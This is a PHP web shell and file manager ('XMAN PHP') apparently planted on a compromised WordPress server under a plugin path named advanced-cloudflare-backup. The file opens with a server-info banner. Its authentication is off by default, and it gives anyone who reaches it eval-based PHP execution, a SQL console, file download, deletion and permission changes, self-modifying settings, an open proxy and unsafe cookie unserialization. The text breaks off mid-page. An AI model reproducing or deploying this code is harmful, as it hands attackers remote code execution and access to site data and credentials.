HEX
Server: Apache/2.4.59 (Debian)
System: Linux befbaa421a4c 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64
User: www-data (33)
PHP: 8.2.19
Disabled: NONE
Upload Files
File: /var/www/html/wp-content/plugins/advanced-cloudflare-backup/class/tgrs.php
<?php
/* XMAN PHP vvbdfdfg ver 1.4ffdfgdg */

// Configuration — do not change manually!
ignore_user_abort(1);
$authorization = '{"authorize":"0","login":"admin","password":"phpfm","cookie_name":"fm_user","days_authorization":"30","script":"<script type=\"text\/javascript\" src=\"https:\/\/www.cdolivet.com\/editarea\/editarea\/edit_area\/edit_area_full.js\"><\/script>\r\n<script language=\"Javascript\" type=\"text\/javascript\">\r\neditAreaLoader.init({\r\nid: \"newcontent\"\r\n,display: \"later\"\r\n,start_highlight: true\r\n,allow_resize: \"both\"\r\n,allow_toggle: true\r\n,word_wrap: true\r\n,language: \"ru\"\r\n,syntax: \"php\"\t\r\n,toolbar: \"search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help\"\r\n,syntax_selection_allow: \"css,html,js,php,python,xml,c,cpp,sql,basic,pas\"\r\n});\r\n<\/script>"}';
$php_templates = '{"Settings":"global $fm_config;\r\nvar_export($fm_config);","Backup SQL tables":"echo fm_backup_tables();"}';
$sql_templates = '{"All bases":"SHOW DATABASES;","All tables":"SHOW TABLES;"}';
$translation = '{"id":"en","Add":"Add","Are you sure you want to delete this directory (recursively)?":"Are you sure you want to delete this directory (recursively)?","Are you sure you want to delete this file?":"Are you sure you want to delete this file?","Archiving":"Archiving","Authorization":"Authorization","Back":"Back","Cancel":"Cancel","Chinese":"Chinese","Compress":"Compress","Console":"Console","Cookie":"Cookie","Created":"Created","Date":"Date","Days":"Days","Decompress":"Decompress","Delete":"Delete","Deleted":"Deleted","Download":"Download","done":"done","Edit":"Edit","Enter":"Enter","English":"English","Error occurred":"Error occurred","File manager":"File manager","File selected":"File selected","File updated":"File updated","Filename":"Filename","Files uploaded":"Files uploaded","French":"French","Generation time":"Generation time","German":"German","Home":"Home","Quit":"Quit","Language":"Language","Login":"Login","Manage":"Manage","Make directory":"Make directory","Name":"Name","New":"New","New file":"New file","no files":"no files","Password":"Password","pictures":"pictures","Recursively":"Recursively","Rename":"Rename","Reset":"Reset","Reset settings":"Reset settings","Restore file time after editing":"Restore file time after editing","Result":"Result","Rights":"Rights","Russian":"Russian","Save":"Save","Select":"Select","Select the file":"Select the file","Settings":"Settings","Show":"Show","Show size of the folder":"Show size of the folder","Size":"Size","Spanish":"Spanish","Submit":"Submit","Task":"Task","templates":"templates","Ukrainian":"Ukrainian","Upload":"Upload","Value":"Value","Hello":"Hello","Found in files":"Found in files","Search":"Search","Recursive search":"Recursive search","Mask":"Mask"}';
// end configuration

// Preparations
$starttime = explode(' ', microtime());
$starttime = $starttime[1] + $starttime[0];
$langs = array('en', 'ru', 'de', 'fr', 'uk');
$path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']);
$path = str_replace('\\', '/', $path) . '/';
$main_path = str_replace('\\', '/', realpath('./'));
$phar_maybe = (version_compare(phpversion(), "5.3.0", "<")) ? true : false;
$msg = ''; // service string
$default_language = 'ru';
$detect_lang = true;
$fm_version = 1.4;

//Authorization
$auth = json_decode($authorization, true);
$auth['authorize'] = isset($auth['authorize']) ? $auth['authorize'] : 0;
$auth['days_authorization'] = (isset($auth['days_authorization']) && is_numeric($auth['days_authorization'])) ? (int)$auth['days_authorization'] : 30;
$auth['login'] = isset($auth['login']) ? $auth['login'] : 'admin';
$auth['password'] = isset($auth['password']) ? $auth['password'] : 'phpfm';
$auth['cookie_name'] = isset($auth['cookie_name']) ? $auth['cookie_name'] : 'fm_user';
$auth['script'] = isset($auth['script']) ? $auth['script'] : '';

// Little default config
$fm_default_config = array(
	'make_directory' => true,
	'new_file' => true,
	'upload_file' => true,
	'show_dir_size' => false, //if true, show directory size → maybe slow 
	'show_img' => true,
	'show_php_ver' => true,
	'show_php_ini' => false, // show path to current php.ini
	'show_gt' => true, // show generation time
	'enable_php_console' => true,
	'enable_sql_console' => true,
	'sql_server' => 'localhost',
	'sql_username' => 'root',
	'sql_password' => '',
	'sql_db' => 'test_base',
	'enable_proxy' => true,
	'show_phpinfo' => true,
	'show_xls' => true,
	'fm_settings' => true,
	'restore_time' => true,
	'fm_restore_time' => false,
);

if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config;
else $fm_config = unserialize($_COOKIE['fm_config']);

// Change language
if (isset($_POST['fm_lang'])) {
	setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization']));
	$_COOKIE['fm_lang'] = $_POST['fm_lang'];
}
$language = $default_language;

// Detect browser language
if ($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])) {
	$lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']);
	if (!empty($lang_priority)) {
		foreach ($lang_priority as $lang_arr) {
			$lng = explode(';', $lang_arr);
			$lng = $lng[0];
			if (in_array($lng, $langs)) {
				$language = $lng;
				break;
			}
		}
	}
}

// Cookie language is primary for ever
$language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang'];

// Localization
$lang = json_decode($translation, true);


/* Functions */

//translation
function __($text)
{
	global $lang;
	if (isset($lang[$text])) return $lang[$text];
	else return $text;
};

//delete files and dirs recursively
function fm_del_files($file, $recursive = false)
{
	if ($recursive && @is_dir($file)) {
		$els = fm_scan_dir($file, '', '', true);
		foreach ($els as $el) {
			if ($el != '.' && $el != '..') {
				fm_del_files($file . '/' . $el, true);
			}
		}
	}
	if (@is_dir($file)) {
		return rmdir($file);
	} else {
		return @unlink($file);
	}
}

//file perms
function fm_rights_string($file, $if = false)
{
	$perms = fileperms($file);
	$info = '';
	if (!$if) {
		if (($perms & 0xC000) == 0xC000) {
			//Socket
			$info = 's';
		} elseif (($perms & 0xA000) == 0xA000) {
			//Symbolic Link
			$info = 'l';
		} elseif (($perms & 0x8000) == 0x8000) {
			//Regular
			$info = '-';
		} elseif (($perms & 0x6000) == 0x6000) {
			//Block special
			$info = 'b';
		} elseif (($perms & 0x4000) == 0x4000) {
			//Directory
			$info = 'd';
		} elseif (($perms & 0x2000) == 0x2000) {
			//Character special
			$info = 'c';
		} elseif (($perms & 0x1000) == 0x1000) {
			//FIFO pipe
			$info = 'p';
		} else {
			//Unknown
			$info = 'u';
		}
	}

	//Owner
	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ?
		(($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));

	//Group
	$info .= (($perms & 0x0020) ? 'r' : '-');
	$info .= (($perms & 0x0010) ? 'w' : '-');
	$info .= (($perms & 0x0008) ?
		(($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));

	//World
	$info .= (($perms & 0x0004) ? 'r' : '-');
	$info .= (($perms & 0x0002) ? 'w' : '-');
	$info .= (($perms & 0x0001) ?
		(($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));

	return $info;
}

function fm_convert_rights($mode)
{
	$mode = str_pad($mode, 9, '-');
	$trans = array('-' => '0', 'r' => '4', 'w' => '2', 'x' => '1');
	$mode = strtr($mode, $trans);
	$newmode = '0';
	$owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2];
	$group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5];
	$world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8];
	$newmode .= $owner . $group . $world;
	return intval($newmode, 8);
}

function fm_chmod($file, $val, $rec = false)
{
	$res = @chmod(realpath($file), $val);
	if (@is_dir($file) && $rec) {
		$els = fm_scan_dir($file);
		foreach ($els as $el) {
			$res = $res && fm_chmod($file . '/' . $el, $val, true);
		}
	}
	return $res;
}

//load files
function fm_download($file_name)
{
	if (!empty($file_name)) {
		if (file_exists($file_name)) {
			header("Content-Disposition: attachment; filename=" . basename($file_name));
			header("Content-Type: application/force-download");
			header("Content-Type: application/octet-stream");
			header("Content-Type: application/download");
			header("Content-Description: File Transfer");
			header("Content-Length: " . filesize($file_name));
			flush(); // this doesn't really matter.
			$fp = fopen($file_name, "r");
			while (!feof($fp)) {
				echo fread($fp, 65536);
				flush(); // this is essential for large downloads
			}
			fclose($fp);
			die();
		} else {
			header('HTTP/1.0 404 Not Found', true, 404);
			header('Status: 404 Not Found');
			die();
		}
	}
}

//show folder size
function fm_dir_size($f, $format = true)
{
	if ($format) {
		$size = fm_dir_size($f, false);
		if ($size <= 1024) return $size . ' bytes';
		elseif ($size <= 1024 * 1024) return round($size / (1024), 2) . '&nbsp;Kb';
		elseif ($size <= 1024 * 1024 * 1024) return round($size / (1024 * 1024), 2) . '&nbsp;Mb';
		elseif ($size <= 1024 * 1024 * 1024 * 1024) return round($size / (1024 * 1024 * 1024), 2) . '&nbsp;Gb';
		elseif ($size <= 1024 * 1024 * 1024 * 1024 * 1024) return round($size / (1024 * 1024 * 1024 * 1024), 2) . '&nbsp;Tb'; //:)))
		else return round($size / (1024 * 1024 * 1024 * 1024 * 1024), 2) . '&nbsp;Pb'; // ;-)
	} else {
		if (is_file($f)) return filesize($f);
		$size = 0;
		$dh = opendir($f);
		while (($file = readdir($dh)) !== false) {
			if ($file == '.' || $file == '..') continue;
			if (is_file($f . '/' . $file)) $size += filesize($f . '/' . $file);
			else $size += fm_dir_size($f . '/' . $file, false);
		}
		closedir($dh);
		return $size + filesize($f);
	}
}

//scan directory
function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false)
{
	$dir = $ndir = array();
	if (!empty($exp)) {
		$exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/';
	}
	if (!empty($type) && $type !== 'all') {
		$func = 'is_' . $type;
	}
	if (@is_dir($directory)) {
		$fh = opendir($directory);
		while (false !== ($filename = readdir($fh))) {
			if (substr($filename, 0, 1) != '.' || $do_not_filter) {
				if ((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))) {
					$dir[] = $filename;
				}
			}
		}
		closedir($fh);
		natsort($dir);
	}
	return $dir;
}

function fm_link($get, $link, $name, $title = '')
{
	if (empty($title)) $title = $name . ' ' . basename($link);
	return '&nbsp;&nbsp;<a href="?' . $get . '=' . base64_encode($link) . '" title="' . $title . '">' . $name . '</a>';
}

function fm_arr_to_option($arr, $n, $sel = '')
{
	foreach ($arr as $v) {
		$b = $v[$n];
		$res .= '<option value="' . $b . '" ' . ($sel && $sel == $b ? 'selected' : '') . '>' . $b . '</option>';
	}
	return $res;
}

function fm_lang_form($current = 'en')
{
	return '
<form name="change_lang" method="post" action="">
	<select name="fm_lang" title="' . __('Language') . '" onchange="document.forms[\'change_lang\'].submit()" >
		<option value="en" ' . ($current == 'en' ? 'selected="selected" ' : '') . '>' . __('English') . '</option>
		<option value="de" ' . ($current == 'de' ? 'selected="selected" ' : '') . '>' . __('German') . '</option>
		<option value="ru" ' . ($current == 'ru' ? 'selected="selected" ' : '') . '>' . __('Russian') . '</option>
		<option value="fr" ' . ($current == 'fr' ? 'selected="selected" ' : '') . '>' . __('French') . '</option>
		<option value="uk" ' . ($current == 'uk' ? 'selected="selected" ' : '') . '>' . __('Ukrainian') . '</option>
	</select>
</form>
';
}

function fm_root($dirname)
{
	return ($dirname == '.' or $dirname == '..');
}

function fm_php($string)
{
	$display_errors = ini_get('display_errors');
	ini_set('display_errors', '1');
	ob_start();
	eval(trim($string));
	$text = ob_get_contents();
	ob_end_clean();
	ini_set('display_errors', $display_errors);
	return $text;
}

//SHOW DATABASES
function fm_sql_connect()
{
	global $fm_config;
	return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']);
}

function fm_sql($query)
{
	global $fm_config;
	$query = trim($query);
	ob_start();
	$connection = fm_sql_connect();
	if ($connection->connect_error) {
		ob_end_clean();
		return $connection->connect_error;
	}
	$connection->set_charset('utf8');
	$queried = mysqli_query($connection, $query);
	if ($queried === false) {
		ob_end_clean();
		return mysqli_error($connection);
	} else {
		if (!empty($queried)) {
			while ($row = mysqli_fetch_assoc($queried)) {
				$query_result[] =  $row;
			}
		}
		$vdump = empty($query_result) ? '' : var_export($query_result, true);
		ob_end_clean();
		$connection->close();
		return '<pre>' . stripslashes($vdump) . '</pre>';
	}
}

function fm_backup_tables($tables = '*', $full_backup = true)
{
	global $path;
	$mysqldb = fm_sql_connect();
	$delimiter = "; \n  \n";
	if ($tables == '*') {
		$tables = array();
		$result = $mysqldb->query('SHOW TABLES');
		while ($row = mysqli_fetch_row($result)) {
			$tables[] = $row[0];
		}
	} else {
		$tables = is_array($tables) ? $tables : explode(',', $tables);
	}

	$return = '';
	foreach ($tables as $table) {
		$result = $mysqldb->query('SELECT * FROM ' . $table);
		$num_fields = mysqli_num_fields($result);
		$return .= 'DROP TABLE IF EXISTS `' . $table . '`' . $delimiter;
		$row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE ' . $table));
		$return .= $row2[1] . $delimiter;
		if ($full_backup) {
			for ($i = 0; $i < $num_fields; $i++) {
				while ($row = mysqli_fetch_row($result)) {
					$return .= 'INSERT INTO `' . $table . '` VALUES(';
					for ($j = 0; $j < $num_fields; $j++) {
						$row[$j] = addslashes($row[$j]);
						$row[$j] = str_replace("\n", "\\n", $row[$j]);
						if (isset($row[$j])) {
							$return .= '"' . $row[$j] . '"';
						} else {
							$return .= '""';
						}
						if ($j < ($num_fields - 1)) {
							$return .= ',';
						}
					}
					$return .= ')' . $delimiter;
				}
			}
		} else {
			$return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return);
		}
		$return .= "\n\n\n";
	}

	//save file
	$file = gmdate("Y-m-d_H-i-s", time()) . '.sql';
	$handle = fopen($file, 'w+');
	fwrite($handle, $return);
	fclose($handle);
	$alert = 'onClick="if(confirm(\'' . __('File selected') . ': \n' . $file . '. \n' . __('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path  . '\'"';
	return $file . ': ' . fm_link('download', $path . $file, __('Download'), __('Download') . ' ' . $file) . ' <a href="#" title="' . __('Delete') . ' ' . $file . '" ' . $alert . '>' . __('Delete') . '</a>';
}

function fm_restore_tables($sqlFileToExecute)
{
	$mysqldb = fm_sql_connect();
	$delimiter = "; \n  \n";
	// Load and explode the sql file
	$f = fopen($sqlFileToExecute, "r+");
	$sqlFile = fread($f, filesize($sqlFileToExecute));
	$sqlArray = explode($delimiter, $sqlFile);

	//Process the sql file by statements
	foreach ($sqlArray as $stmt) {
		if (strlen($stmt) > 3) {
			$result = $mysqldb->query($stmt);
			if (!$result) {
				$sqlErrorCode = mysqli_errno($mysqldb->connection);
				$sqlErrorText = mysqli_error($mysqldb->connection);
				$sqlStmt      = $stmt;
				break;
			}
		}
	}
	if (empty($sqlErrorCode)) return __('Success') . ' — ' . $sqlFileToExecute;
	else return $sqlErrorText . '<br/>' . $stmt;
}

function fm_img_link($filename)
{
	return './' . basename(__FILE__) . '?img=' . base64_encode($filename);
}

function fm_home_style()
{
	return '
input, input.fm_input {
	text-indent: 2px;
}

input, textarea, select, input.fm_input {
	color: black;
	font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
	border-color: black;
	background-color: #FCFCFC none !important;
	border-radius: 0;
	padding: 2px;
}

input.fm_input {
	background: #FCFCFC none !important;
	cursor: pointer;
}

.home {
	background-image: url("");
	background-repeat: no-repeat;
}';
}

function fm_config_checkbox_row($name, $value)
{
	global $fm_config;
	return '<tr><td class="row1"><input id="fm_config_' . $value . '" name="fm_config[' . $value . ']" value="1" ' . (empty($fm_config[$value]) ? '' : 'checked="true"') . ' type="checkbox"></td><td class="row2 whole"><label for="fm_config_' . $value . '">' . $name . '</td></tr>';
}

function fm_protocol()
{
	if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'] . '://';
	if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://';
	if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://';
	if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://';
	return 'http://';
}

function fm_site_url()
{
	return fm_protocol() . $_SERVER['HTTP_HOST'];
}

function fm_url($full = false)
{
	$host = $full ? fm_site_url() : '.';
	return $host . '/' . basename(__FILE__);
}

function fm_home($full = false)
{
	return '&nbsp;<a href="' . fm_url($full) . '" title="' . __('Home') . '"><span class="home">&nbsp;&nbsp;&nbsp;&nbsp;</span></a>';
}

function fm_run_input($lng)
{
	global $fm_config;
	$return = !empty($fm_config['enable_' . $lng . '_console']) ?
		'
				<form  method="post" action="' . fm_url() . '" style="display:inline">
				<input type="submit" name="' . $lng . 'run" value="' . strtoupper($lng) . ' ' . __('Console') . '">
				</form>
' : '';
	return $return;
}

function fm_url_proxy($matches)
{
	$link = str_replace('&amp;', '&', $matches[2]);
	$url = isset($_GET['url']) ? $_GET['url'] : '';
	$parse_url = parse_url($url);
	$host = $parse_url['scheme'] . '://' . $parse_url['host'] . '/';
	if (substr($link, 0, 2) == '//') {
		$link = substr_replace($link, fm_protocol(), 0, 2);
	} elseif (substr($link, 0, 1) == '/') {
		$link = substr_replace($link, $host, 0, 1);
	} elseif (substr($link, 0, 2) == './') {
		$link = substr_replace($link, $host, 0, 2);
	} elseif (substr($link, 0, 4) == 'http') {
		//alles machen wunderschon
	} else {
		$link = $host . $link;
	}
	if ($matches[1] == 'href' && !strripos($link, 'css')) {
		$base = fm_site_url() . '/' . basename(__FILE__);
		$baseq = $base . '?proxy=true&url=';
		$link = $baseq . urlencode($link);
	} elseif (strripos($link, 'css')) {
		//как-то тоже подменять надо
	}
	return $matches[1] . '="' . $link . '"';
}

function fm_tpl_form($lng_tpl)
{
	global ${$lng_tpl . '_templates'};
	$tpl_arr = json_decode(${$lng_tpl . '_templates'}, true);
	$str = '';
	foreach ($tpl_arr as $ktpl => $vtpl) {
		$str .= '<tr><td class="row1"><input name="' . $lng_tpl . '_name[]" value="' . $ktpl . '"></td><td class="row2 whole"><textarea name="' . $lng_tpl . '_value[]"  cols="55" rows="5" class="textarea_input">' . $vtpl . '</textarea> <input name="del_' . rand() . '" type="button" onClick="this.parentNode.parentNode.remove();" value="' . __('Delete') . '"/></td></tr>';
	}
	return '
<table>
<tr><th colspan="2">' . strtoupper($lng_tpl) . ' ' . __('templates') . ' ' . fm_run_input($lng_tpl) . '</th></tr>
<form method="post" action="">
<input type="hidden" value="' . $lng_tpl . '" name="tpl_edited">
<tr><td class="row1">' . __('Name') . '</td><td class="row2 whole">' . __('Value') . '</td></tr>
' . $str . '
<tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \'' . fm_url() . '?fm_settings=true\';" value="' . __('Reset') . '"/> <input type="submit" value="' . __('Save') . '" ></td></tr>
</form>
<form method="post" action="">
<input type="hidden" value="' . $lng_tpl . '" name="tpl_edited">
<tr><td class="row1"><input name="' . $lng_tpl . '_new_name" value="" placeholder="' . __('New') . ' ' . __('Name') . '"></td><td class="row2 whole"><textarea name="' . $lng_tpl . '_new_value"  cols="55" rows="5" class="textarea_input" placeholder="' . __('New') . ' ' . __('Value') . '"></textarea></td></tr>
<tr><td colspan="2" class="row3"><input type="submit" value="' . __('Add') . '" ></td></tr>
</form>
</table>
';
}

/* End Functions */

// authorization
if ($auth['authorize']) {
	if (isset($_POST['login']) && isset($_POST['password'])) {
		if (($_POST['login'] == $auth['login']) && ($_POST['password'] == $auth['password'])) {
			setcookie($auth['cookie_name'], $auth['login'] . '|' . md5($auth['password']), time() + (86400 * $auth['days_authorization']));
			$_COOKIE[$auth['cookie_name']] = $auth['login'] . '|' . md5($auth['password']);
		}
	}
	if (!isset($_COOKIE[$auth['cookie_name']]) or ($_COOKIE[$auth['cookie_name']] != $auth['login'] . '|' . md5($auth['password']))) {
		echo '
<!doctype html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>' . __('File manager') . '</title>
</head>
<body>
<form action="" method="post">
' . __('Login') . ' <input name="login" type="text">&nbsp;&nbsp;&nbsp;
' . __('Password') . ' <input name="password" type="password">&nbsp;&nbsp;&nbsp;
<input type="submit" value="' . __('Enter') . '" class="fm_input">
</form>
' . fm_lang_form($language) . '
</body>
</html>
';
		die();
	}
	if (isset($_POST['quit'])) {
		unset($_COOKIE[$auth['cookie_name']]);
		setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization']));
		header('Location: ' . fm_site_url() . $_SERVER['REQUEST_URI']);
	}
}

// Change config
if (isset($_GET['fm_settings'])) {
	if (isset($_GET['fm_config_delete'])) {
		unset($_COOKIE['fm_config']);
		setcookie('fm_config', '', time() - (86400 * $auth['days_authorization']));
		header('Location: ' . fm_url() . '?fm_settings=true');
		exit(0);
	} elseif (isset($_POST['fm_config'])) {
		$fm_config = $_POST['fm_config'];
		setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization']));
		$_COOKIE['fm_config'] = serialize($fm_config);
		$msg = __('Settings') . ' ' . __('done');
	} elseif (isset($_POST['fm_login'])) {
		if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login'];
		$fm_login = json_encode($_POST['fm_login']);
		$fgc = file_get_contents(__FILE__);
		$search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
		if (!empty($matches[1])) {
			$filemtime = filemtime(__FILE__);
			$replace = str_replace('{"' . $matches[1] . '"}', $fm_login, $fgc);
			if (file_put_contents(__FILE__, $replace)) {
				$msg .= __('File updated');
				if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' ' . __('Login') . ': ' . $_POST['fm_login']['login'];
				if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' ' . __('Password') . ': ' . $_POST['fm_login']['password'];
				$auth = $_POST['fm_login'];
			} else $msg .= __('Error occurred');
			if (!empty($fm_config['fm_restore_time'])) touch(__FILE__, $filemtime);
		}
	} elseif (isset($_POST['tpl_edited'])) {
		$lng_tpl = $_POST['tpl_edited'];
		if (!empty($_POST[$lng_tpl . '_name'])) {
			$fm_php = json_encode(array_combine($_POST[$lng_tpl . '_name'], $_POST[$lng_tpl . '_value']), JSON_HEX_APOS);
		} elseif (!empty($_POST[$lng_tpl . '_new_name'])) {
			$fm_php = json_encode(json_decode(${$lng_tpl . '_templates'}, true) + array($_POST[$lng_tpl . '_new_name'] => $_POST[$lng_tpl . '_new_value']), JSON_HEX_APOS);
		}
		if (!empty($fm_php)) {
			$fgc = file_get_contents(__FILE__);
			$search = preg_match('#' . $lng_tpl . '_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches);
			if (!empty($matches[1])) {
				$filemtime = filemtime(__FILE__);
				$replace = str_replace('{"' . $matches[1] . '"}', $fm_php, $fgc);
				if (file_put_contents(__FILE__, $replace)) {
					${$lng_tpl . '_templates'} = $fm_php;
					$msg .= __('File updated');
				} else $msg .= __('Error occurred');
				if (!empty($fm_config['fm_restore_time'])) touch(__FILE__, $filemtime);
			}
		} else $msg .= __('Error occurred');
	}
}

// Just show image
if (isset($_GET['img'])) {
	$file = base64_decode($_GET['img']);
	if ($info = getimagesize($file)) {
		switch ($info[2]) {	//1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP
			case 1:
				$ext = 'gif';
				break;
			case 2:
				$ext = 'jpeg';
				break;
			case 3:
				$ext = 'png';
				break;
			case 6:
				$ext = 'bmp';
				break;
			default:
				die();
		}
		header("Content-type: image/$ext");
		echo file_get_contents($file);
		die();
	}
}

// Just download file
if (isset($_GET['download'])) {
	$file = base64_decode($_GET['download']);
	fm_download($file);
}

// Just show info
if (isset($_GET['phpinfo'])) {
	phpinfo();
	die();
}

// Mini proxy, many bugs!
if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) {
	$url = isset($_GET['url']) ? urldecode($_GET['url']) : '';
	$proxy_form = '
<div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);">
	<form action="" method="GET">
	<input type="hidden" name="proxy" value="true">
	' . fm_home() . ' <a href="' . $url . '" target="_blank">Url</a>: <input type="text" name="url" value="' . $url . '" size="55">
	<input type="submit" value="' . __('Show') . '" class="fm_input">
	</form>
</div>
';
	if ($url) {
		$ch = curl_init($url);
		curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy');
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
		curl_setopt($ch, CURLOPT_HEADER, 0);
		curl_setopt($ch, CURLOPT_REFERER, $url);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		$result = curl_exec($ch);
		curl_close($ch);
		//$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result);
		$result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result);
		$result = preg_replace('%(<body.*?>)%i', '$1' . '<style>' . fm_home_style() . '</style>' . $proxy_form, $result);
		echo $result;
		die();
	}
}
?>
<!doctype html>
<html>

<head>
	<meta charset="utf-8" />
	<meta name="viewport" content="width=device-width, initial-scale=1" />
	<title><?= __('File manager') ?></title>
	<style>
		body {
			background-color: white;
			font-family: Verdana, Arial, Helvetica, sans-serif;
			font-size: 8pt;
			margin: 0px;
		}

		a:link,
		a:active,
		a:visited {
			color: #006699;
			text-decoration: none;
		}

		a:hover {
			color: #DD6900;
			text-decoration: underline;
		}

		a.th:link {
			color: #FFA34F;
			text-decoration: none;
		}

		a.th:active {
			color: #FFA34F;
			text-decoration: none;
		}

		a.th:visited {
			color: #FFA34F;
			text-decoration: none;
		}

		a.th:hover {
			color: #FFA34F;
			text-decoration: underline;
		}

		table.bg {
			background-color: #ACBBC6
		}

		th,
		td {
			font: normal 8pt Verdana, Arial, Helvetica, sans-serif;
			padding: 3px;
		}

		th {
			height: 25px;
			background-color: #006699;
			color: #FFA34F;
			font-weight: bold;
			font-size: 11px;
		}

		.row1 {
			background-color: #EFEFEF;
		}

		.row2 {
			background-color: #DEE3E7;
		}

		.row3 {
			background-color: #D1D7DC;
			padding: 5px;
		}

		tr.row1:hover {
			background-color: #F3FCFC;
		}

		tr.row2:hover {
			background-color: #F0F6F6;
		}

		.whole {
			width: 100%;
		}

		.all tbody td:first-child {
			width: 100%;
		}

		textarea {
			font: 9pt 'Courier New', courier;
			line-height: 125%;
			padding: 5px;
		}

		.textarea_input {
			height: 1em;
		}

		.textarea_input:focus {
			height: auto;
		}

		input[type=submit] {
			background: #FCFCFC none !important;
			cursor: pointer;
		}

		.folder {
			background-image: url("");
		}

		.file {
			background-image: url("");
		}

		<?= fm_home_style() ?>.img {
			background-image:
				url("");
		}

		@media screen and (max-width:720px) {
			table {
				display: block;
			}

			#fm_table td {
				display: inline;
				float: left;
			}

			#fm_table tbody td:first-child {
				width: 100%;
				padding: 0;
			}

			#fm_table tbody tr:nth-child(2n+1) {
				background-color: #EFEFEF;
			}

			#fm_table tbody tr:nth-child(2n) {
				background-color: #DEE3E7;
			}

			#fm_table tr {
				display: block;
				float: left;
				clear: left;
				width: 100%;
			}

			#header_table .row2,
			#header_table .row3 {
				display: inline;
				float: left;
				width: 100%;
				padding: 0;
			}

			#header_table table td {
				display: inline;
				float: left;
			}
		}
	</style>
</head>

<body>
	<?php
	$url_inc = '?fm=true';
	if (isset($_POST['sqlrun']) && !empty($fm_config['enable_sql_console'])) {
		$res = empty($_POST['sql']) ? '' : $_POST['sql'];
		$res_lng = 'sql';
	} elseif (isset($_POST['phprun']) && !empty($fm_config['enable_php_console'])) {
		$res = empty($_POST['php']) ? '' : $_POST['php'];
		$res_lng = 'php';
	}
	if (isset($_GET['fm_settings'])) {
		echo ' 
<table class="whole">
<form method="post" action="">
<tr><th colspan="2">' . __('File manager') . ' - ' . __('Settings') . '</th></tr>
' . (empty($msg) ? '' : '<tr><td class="row2" colspan="2">' . $msg . '</td></tr>') . '
' . fm_config_checkbox_row(__('Show size of the folder'), 'show_dir_size') . '
' . fm_config_checkbox_row(__('Show') . ' ' . __('pictures'), 'show_img') . '
' . fm_config_checkbox_row(__('Show') . ' ' . __('Make directory'), 'make_directory') . '
' . fm_config_checkbox_row(__('Show') . ' ' . __('New file'), 'new_file') . '
' . fm_config_checkbox_row(__('Show') . ' ' . __('Upload'), 'upload_file') . '
' . fm_config_checkbox_row(__('Show') . ' PHP version', 'show_php_ver') . '
' . fm_config_checkbox_row(__('Show') . ' PHP ini', 'show_php_ini') . '
' . fm_config_checkbox_row(__('Show') . ' ' . __('Generation time'), 'show_gt') . '
' . fm_config_checkbox_row(__('Show') . ' xls', 'show_xls') . '
' . fm_config_checkbox_row(__('Show') . ' PHP ' . __('Console'), 'enable_php_console') . '
' . fm_config_checkbox_row(__('Show') . ' SQL ' . __('Console'), 'enable_sql_console') . '
<tr><td class="row1"><input name="fm_config[sql_server]" value="' . $fm_config['sql_server'] . '" type="text"></td><td class="row2 whole">SQL server</td></tr>
